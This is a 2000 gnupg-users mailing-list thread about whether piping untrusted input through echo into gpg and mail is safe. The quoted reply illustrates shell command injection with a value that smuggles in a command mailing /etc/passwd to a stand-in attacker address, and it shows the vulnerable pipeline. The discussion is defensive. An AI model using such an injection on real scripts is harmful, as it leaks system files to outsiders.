possible security hole

Derek Vokey turfdog@planetturf.ca
Mon, 4 Dec 2000 21:26:59 -0800 

thank you for your input.
Could I bother you to "briefly" explain encoding to base64?

----- Original Message -----
From: "Jason Martin" <jhmartin@mail.com>
To: "Derek Vokey" <turfdog@planetturf.ca>
Cc: <gnupg-users@gnupg.org>
Sent: Monday, December 04, 2000 5:05 PM
Subject: Re: possible security hole



> -----BEGIN PGP SIGNED MESSAGE-----

> Hash: SHA1

>

> I believe posible exploits are if $sensitiveinfo contains things like

> "blah; mail someone.evil@hacker.org </etc/passwd".  The idea is that the

> shell can be tricked depending on $sensitiveinfo to do things you don't

> intend. Maybe if you base64 encode $sensitiveinfo first you'll be

> more-or-less immune from shell exploits. From a purely crypto point of

> view; I don't see anything wrong with this if we assume that

> $sensitiveinfo is guarenteed to have shell-safe values.

>

> - -Jason Martin

>

> > "echo $sensitiveinfo|gpg  --homedir /my/home/dir --always-trust -ear

me|mail

> > to\@me.com"

> >

> > the script runs as nobody

> > the secret key has never seen the server

> > the script only encrypts

> > I don't care who the message comes from I only want the $sensitiveinfo

>

> - --

> PGP KeyID=0xEA954813

> Fingerprint:3B07 518C D76E 572F 7DAA  88A5 9763 835A EA95 4813

> finger jhmartin@pitr.scs.wsu.edu for key

> -----BEGIN PGP SIGNATURE-----

> Version: GnuPG v1.0.4 (GNU/Linux)

> Comment: For info see http://www.gnupg.org

> Filter: gpg4pine 4.1 (http://azzie.robotics.net)

>

> iQEMBAERAgDMBQI6LD9snRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t

> IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP

> LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg

> YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5

> bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgThWwAn1t+IvCo+II8Ey+2

> bGOvoUdPUac7AJ9wkqxWKGFJIHZqWlsNJ81K//2Tjw==

> =xi3u

> -----END PGP SIGNATURE-----

>

> --

> Archive is at http://lists.gnupg.org - Unsubscribe by sending mail

> with a subject of  "unsubscribe"  to gnupg-users-request@gnupg.org

>


-- 
Archive is at http://lists.gnupg.org - Unsubscribe by sending mail
with a subject of  "unsubscribe"  to gnupg-users-request@gnupg.org